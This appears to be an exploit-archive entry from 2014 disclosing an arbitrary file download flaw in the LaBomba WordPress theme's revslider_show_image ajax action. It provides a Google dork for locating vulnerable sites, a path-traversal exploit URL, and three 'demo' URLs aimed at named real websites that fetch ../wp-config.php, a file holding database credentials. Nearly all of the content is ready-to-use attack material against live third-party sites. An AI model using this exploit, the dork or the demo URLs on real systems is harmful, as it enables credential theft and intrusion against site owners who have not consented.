id: 22652
date: 09/17/2014
title: WordPress Theme LaBomba Arbitrary File Download Vulnerability
author: null_pointer
cves: 

Exploit Title : WordPress Theme LaBomba Arbitrary File Download Vulnerability

Exploit Author : NULL_Pointer

Date : 17/09/2014

Vendor Homepage : http://themeforest.net/item/labomba-responsive-multipurpose-wordpress-theme/6106367

Version: 1.7

Google Dork : inurl:"/wp-content/themes/labomba/"

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme LaBomba suffers from Arbitrary File Download Vulnerability.

Exploit : http://127.0.0.1/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Demo Sites :

http://oryany.dreamhosters.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://peoplepr.ro/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://xxlsport.hr/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2023-03-25]  #